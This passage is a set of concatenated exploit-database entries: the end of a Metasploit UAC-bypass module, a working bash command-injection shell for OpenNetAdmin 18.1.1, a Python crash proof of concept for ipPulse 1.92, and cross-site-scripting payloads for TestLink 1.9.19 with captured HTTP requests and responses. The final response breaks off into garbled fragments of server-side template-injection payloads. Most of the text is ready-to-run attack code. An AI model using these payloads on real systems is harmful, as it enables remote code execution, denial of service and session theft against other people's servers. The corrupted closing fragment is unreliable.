    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping""${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
# Discovery by: Diego Buztamante
# Discovery Date: 2019-11-18
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code : python ipPulse_1.92.py
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
# 3.- Open ippulse.exe
# 4.- Click on "Enter Key"
# 5.- Paste ClipBoard on "Name: "
# 6.- OK
# 7.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 256
f = open ("ipPulse_1.92.txt", "w")
f.write(buffer)
f.close()

# Exploit Title: TestLink 1.9.19 - Persistent Cross-Site Scripting
# Date: 2019-11-20
# Exploit Author: Milad Khoshdel
# Software Link: http://testlink.org/
# Version: TestLink 1.9.19
# Tested on: Linux Apache/2 PHP/7.3.11


=========
Vulnerable Pages:
=========

Persistent --> https://[TestLink-URL]/testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=%3cscRipt%3ealert(0x008B19)%3c%2fscRipt%3e&id=4&show_mode=show&version_id=3
Non-Persistent --> https://[TestLink-URL]/testlink/index.php?caller=login&reqURI=javascript%3aalert(0x002082)&viewer=3
Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&nsextt=%3cscRipt%3ealert(0x00A5CA)%3c%2fscRipt%3e&show_mode=editDisabled&step_id=
Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&%3cscRipt%3ealert(0x00A5CE)%3c%2fscRipt%3e=nsextt&show_mode=editDisabled
Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&show_mode=%3cscRipt%3ealert(0x00A54D)%3c%2fscRipt%3e&step_id=


=========
POC:
=========

REGUEST -->

GET /testlink/index.php?caller=login&reqURI=javascript%3aalert(0x002082)&viewer=3 HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TL_lastTestProjectForUserID_2=1; TESTLINK197TL_lastTestPlanForUserID_1=2; TESTLINK197TL_user2_proj1_testPlanId=2; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd
Referer: http://127.0.0.1/testlink/login.php?viewer=3
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36


RESPONSE -->

HTTP/1.1 200 OK
Server: Apache
Content-Length: 526
X-Powered-By: PHP/7.3.11
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=50
X-Frame-Options: SAMEORIGIN
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Encoding: 
Date: Wed, 20 Nov 2019 11:29:45 GMT
Vary: Cookie,Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate

<!DOCTYPE html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-language" content="en" />
<meta name="generator" content="testlink" />
<meta name="author" content="TestLink Development Team" />
<meta name="copyright" content="TestLink Development Team" />
<meta name="robots" content="NOFOLLOW" />
<title>TestLink 1.9.19</title>
<meta name="description" content="TestLink - TestLink ::: Main Page" />
<link rel="icon" href="http://127.0.0.1/testlink/gui/themes/default/images/favicon.ico" type="image/x-icon" />
</head>


<frameset rows="70,*" frameborder="0" framespacing="0">
<frame src="lib/general/navBar.php?tproject_id=0&tplan_id=0&updateMainPage=1" name="titlebar" scrolling="no" noresize="noresize" />
<frame src="javascript:alert(0x002082)" scrolling='auto' name='mainframe' />
<noframes>
<body>
   TestLink required a frames supporting browser.
</body>
</noframes>
</frameset>


-------------------------------------------------

STEP 1 -->

[Request]
GET /testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=%3cscRipt%3ealert(0x008B19)%3c%2fscRipt%3e&id=4&show_mode=show&version_id=3 HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TESTLINK197ys-tproject_1_ext-comp-1001=a%3As%253A%2F1%2F3; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd; TESTLINK197TL_user2_proj1_testPlanId=2; TESTLINK197TL_lastTestPlanForUserID_1=2; TL_lastTestProjectForUserID_2=1
Referer: http://127.0.0.1/testlink/lib/testcases/tcEdit.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36


[Response]
HTTP/1.1 200 OK
Server: Apache
Content-Length: 0
X-Powered-By: PHP/7.3.11
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=47
X-Frame-Options: SAMEORIGIN
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Wed, 20 Nov 2019 11:59:45 GMT
Vary: Cookie
Cache-Control: no-store, no-cache, must-revalidate

STEP 2 -->

[Request]
GET /testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=testcase&id=127.0.0.1/trace.axd&show_mode=show&version_id=3 HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TESTLINK197ys-tproject_1_ext-comp-1001=a%3As%253A%2F1%2F3; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd; TESTLINK197TL_user2_proj1_testPlanId=2; TL_lastTestProjectForUserID_2=1; TESTLINK197TL_lastTestPlanForUserID_1=2
Referer: http://127.0.0.1/testlink/lib/testcases/tcEdit.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36


[Response]
#Identification Page
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Server: Apache
X-Powered-By: PHP/7.3.11
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=98
X-Frame-Options: SAMEORIGIN
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Encoding: 
Date: Wed, 20 Nov 2019 12:02:38 GMT
Vary: Cookie,Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate

ner_title_{php}Smarty_Resource::parseResourceName(system("ns,[container_title_<scRipt>alert(0x008B19)</scRipt>] => container_title_<scRipt>alert(0x008B19)</scRipt>,[container_title_{{_self.env.registerUndefinedFilterCallback("sys